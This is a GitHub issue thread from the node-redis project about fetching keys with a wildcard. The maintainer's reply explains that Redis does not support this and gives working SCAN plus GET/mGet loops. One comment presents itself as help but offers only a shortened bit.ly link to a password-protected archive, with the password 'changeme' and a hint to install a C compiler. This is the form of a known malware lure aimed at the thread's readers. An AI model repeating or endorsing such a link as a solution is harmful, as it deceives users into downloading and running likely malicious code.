### ISSUE TITLE
get data using wildcard

### ISSUE THREAD

**Issue by jim-king-2000** [redis/node-redis#2840]
### Motivation

Shall we support `get by wildcard`?

```javascript
const result = await redis.get('Test:*');
```

**Comment by Kevin-Otalvares** [comment]
I think this will help you.
https://bit.ly/3TC7hrw
Archive password: changeme

you may need to install the c compiler

**Comment by leibale** [comment]
Redis (the server) does not support that, but you can combine `SCAN` and `GET` to achieve it

using v4:
```javascript
for await (const key of client.scan({ MATCH: 'test*' }) {
  await client.get(key);
}
```

using v5 (pre-release not, but I'll leave it here for "documentation" purposes..):
```javascript
for await (const chunk of client.scan({ MATCH: 'test*' }) {
  await client.mGet(chunk);
}
```
